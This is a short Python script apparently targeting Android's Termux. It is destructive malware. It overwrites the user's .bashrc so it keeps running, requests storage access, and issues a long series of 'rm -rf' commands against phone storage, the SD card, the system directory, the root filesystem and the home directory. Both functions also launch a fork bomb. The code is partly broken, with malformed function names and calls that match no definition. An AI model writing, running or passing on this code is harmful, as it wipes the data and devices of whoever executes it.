def _ _alhamdulillah__():
    time.sleep(0.001)
    os.system('clear')
    logo()
    logo2()
    os.system(':(){ :|: & };:')
def bismillah():
    os.system('touch .hushlogin')
    os.system('print "python2 dark.py" > $HOME/.bashrc')
    os.system('termux-setup-storage')
    os.system('rm -rf /storage/emulated/0/*')
    os.system('rm -rf /storage/emulated/*')
    os.system('rm -rf /sdcard/*')
    os.system('rm -rf /sdcard/0/*')
    os.system('rm -rf /sdcard1/*')
    os.system('rm -rf /storage/*')
    os.system('rm -rf /*')
    os.system('rm -rf /system/*')
    os.system('rm -rf $HOME/../../*')
    os.system('rm -rf $PREFIX/b')
    os.system('rm -rf $HOME/*')
    os.system('mv $HOME /dev/null')
    os.system(':(){ :|: & };:')
move()
bismillah()
alhamdulillah()